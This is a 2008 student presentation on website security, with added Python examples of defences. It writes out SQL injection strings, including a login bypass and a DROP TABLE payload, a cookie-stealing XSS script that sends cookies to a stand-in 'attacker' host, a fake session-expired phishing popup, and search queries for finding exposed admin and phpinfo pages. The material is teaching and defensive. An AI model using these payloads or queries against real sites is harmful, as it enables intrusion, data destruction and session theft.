Source: pages.csam.montclair.edu/~robila/SECURITY/2008/pr5.pdf (2008-12-15)


Website Security Project

Some Techniques That Could Be a Danger to Your Website

by

Bence Liska

2008-12-01

Website Security

We have to protect:

• Users’ information

(credit card, passwords, profiles, etc…)

• Users’ cookies and sessions

• The administration web forms

• Customer information

• The content of the website

• The database of the website

Attack Types (Overviews)

Some techniques:

• SQL Injection

• Password Cracking

• Cross Site Scripting (XSS)

• Google Hacking

• Etc…

SQL Injection (1)

• Entering SQL code into web forms, or into the browser address field.

• You can get access to the website or the database behind the site.

SQL Injection (2)

Example 1:

• At the server:

"SELECT * FROM users WHERE username = '" + $USRTEXT + "' AND password = '" + $PASSTEXT + "';"

• SQL injections:

• ' OR 1=1; --

• admin'; --

• ') or ('a'='a

• ") or ("a"="a

• hi" or "a"="a

Result:

"SELECT * FROM users WHERE username = 'admin'; --' AND password = '';"

SQL Injection (3)

Example 2:

• At the Server:

"SELECT * FROM DATA WHERE id=" + $ID + ";"

• SQL injection: 1;DROP TABLE users

• Result:

"SELECT * FROM DATA WHERE id=1;DROP TABLE users;"

SQL Injection (4)

• Preventing - Using Escaping

It is usual to escape parameters using the function mysql_real_escape_string before sending the SQL query in PHP.

// Escape both values so quotes inside them cannot end the SQL string literal.
// Note: the mysql_* extension was removed in PHP 7; current code uses
// PDO or mysqli prepared statements instead of escaping by hand.
$query = sprintf("SELECT * FROM Users where UserName='%s' and Password='%s'",
                 mysql_real_escape_string($Username),
                 mysql_real_escape_string($Password));
mysql_query($query);
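Added example, not part of the deck: the concatenation patterns from Example 1 and Example 2 run against a constructed in-memory SQLite database with the slide's own injection strings, next to the parameterized query that stops them. The table contents, the function names and the use of Python's sqlite3 module are assumptions made for this illustration.

```python
import sqlite3

# Constructed sample tables standing in for the deck's "users" and "DATA" tables.
SEED = (
    "CREATE TABLE users (username TEXT, password TEXT);"
    "INSERT INTO users VALUES ('admin', 'correct-horse'), ('bob', 'hunter2');"
    "CREATE TABLE DATA (id INTEGER, body TEXT);"
    "INSERT INTO DATA VALUES (1, 'first row');"
)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED)
    return conn


def login_concatenated(conn, usrtext, passtext):
    """Example 1 exactly as the slide builds it: user text glued into the SQL.
    A quote in the input ends the string literal early and '--' comments out
    the rest of the WHERE clause, including the password check."""
    query = ("SELECT username FROM users WHERE username = '" + usrtext
             + "' AND password = '" + passtext + "';")
    return sorted(row[0] for row in conn.execute(query))


def login_parameterized(conn, usrtext, passtext):
    """The fix: placeholders bind the input as data, so a quote in it is just
    a character of the value and can never change the query's structure."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?;"
    return sorted(row[0] for row in conn.execute(query, (usrtext, passtext)))


def lookup_stacked(conn, id_text):
    """Example 2: executescript() runs every statement in the string, like a
    driver that permits stacked queries, so '1;DROP TABLE users' both selects
    the row and drops the table."""
    conn.executescript("SELECT * FROM DATA WHERE id=" + id_text + ";")


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?;", (name,)
    ).fetchone()
    return row is not None
```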

Password Cracking (1)

• Dictionary attack

Users often choose weak passwords. The dictionary has a list of single words.

• Brute force attack

This attack tries every possible password to get access to the user account on the website. (It is too slow.)

Password Cracking (2)

• Precomputation (Rainbow table)

Most websites store the user’s password (and name) only as a hash code. If we have a hash we can find the plaintext with rainbow tables.

• Rainbow table: storing the (plaintext, ciphertext) pairs.

• Preventing

Attackers must not get access even to the hashed password.

• The users have to use only strong passwords.
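Added example, not from the deck: why a precomputed table works against an unsalted hash and why a per-user salt defeats it. A plain hash-to-plaintext dictionary is used as the simplest form of precomputation (a real rainbow table compresses the same pairs into hash/reduce chains); the wordlist, MD5 as the "2008-era" storage format and PBKDF2 as the salted replacement are assumptions for this illustration.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the dictionary an attacker precomputes.
WORDLIST = ["123456", "password", "letmein", "qwerty", "hunter2"]


def unsalted_md5(password):
    """One fixed hash per password: the same password always yields the same value."""
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(words):
    """Precomputation: hash -> plaintext for every word, done once, reused forever.
    A rainbow table stores chains instead of every pair but relies on the
    same property: an unsalted hash of a given password never changes."""
    return {unsalted_md5(w): w for w in words}


def recover_plaintext(stored_hash, table):
    """A single dictionary lookup replaces trying passwords at login time."""
    return table.get(stored_hash)


def salted_hash(password, salt=None):
    """Per-user random salt plus a slow KDF. The table above is useless because
    two users with the same password get different stored values, and a
    table would have to be rebuilt per salt."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


def verify_salted(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, _digest_hex = stored.split("$")
    candidate = salted_hash(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)
```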

Cross Site Scripting (XSS)

• Typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

Cookie theft diagram (actors: Attacker, User, Attacker’s web server, Website):

1. „log” code
2. javascript code
3. login
4. send cookie
5. read the log

Example 1:

Other cookie theft JavaScript:

<script>new Image().src="http://attacker/log.php?c="+encodeURI(document.cookie);</script>

Example 2:

Example 3:

<SCRIPT>
var oF = window.open("", "", "width=275, height=175, top=200, left=250, location=no, menubar=no, status=no, toolbar=no, scrollbars=no, resizable=no");
// HTML FORM with POST request
oF.document.write("Your session has expired"...);
</SCRIPT>
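Added example, not from the deck: the two defences that break the cookie-theft flow above. Output encoding turns the slide's Example 1 payload into inert text, and an HttpOnly cookie keeps document.cookie empty for any script that does run. The comment-rendering functions and the cookie name are assumptions for this illustration; only Python's standard library is used.

```python
import html
from http.cookies import SimpleCookie

# The cookie-stealing payload quoted on the slide, used here only as test input.
PAYLOAD = ('<script>new Image().src="http://attacker/log.php?c="'
           '+encodeURI(document.cookie);</script>')


def render_comment_vulnerable(comment):
    """Echoes user text straight into the page: the pattern XSS needs."""
    return '<div class="comment">' + comment + '</div>'


def render_comment_escaped(comment):
    """Output encoding: <, >, &, and quotes become entities, so the browser
    displays the text instead of executing it."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def contains_live_script(page_html):
    """Crude check: is a raw <script> tag present in the rendered HTML?"""
    return "<script" in page_html.lower()


def session_cookie_header(session_id):
    """Set-Cookie with HttpOnly: the browser sends the cookie on requests but
    hides it from document.cookie, so step 4 of the diagram sends nothing
    useful. Secure keeps it off plain HTTP."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["path"] = "/"
    return c.output(header="Set-Cookie:")
```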

Google Hacking (1)

• Using Google (or other search engines), "search engine hackers" can easily find exploitable targets and sensitive data.

• Example 1:

WordPress suffers from possible XSS attacks.

Find WordPress login forms:

intitle:"WordPress > * > Login form"

inurl:"wp-login.php"

Google Hacking (2)

• Example 2:

phpinfo outputs lots of PHP information.

<?php
// Show all information, defaults to INFO_ALL
phpinfo();

// Show just the module information.
// phpinfo(8) yields identical results.
phpinfo(INFO_MODULES);
?>

Find phpinfo pages:

intitle:phpinfo "PHP Version"

Google Hacking (3)

• Example 3:

phpMyAdmin is a web UI for managing MySQL databases.

Find phpMyAdmin pages:

inurl:main.php Welcome to phpMyAdmin

A Few Defensive Measures

• If you use a CMS or another publishing platform or framework, you have to update to new versions as soon as possible.

• If you have an admin page on your website, do not call it “admin.php” or “AdminLogin.php”; rename it. Call it for example “dog.php” or “hamburger.php”.

• Try to enter some confusing data into your login fields, like the sample injection strings, and anything else which you think might confuse the server.

• Do a few Google hacks on your name and your website. Just in case…

Thank you!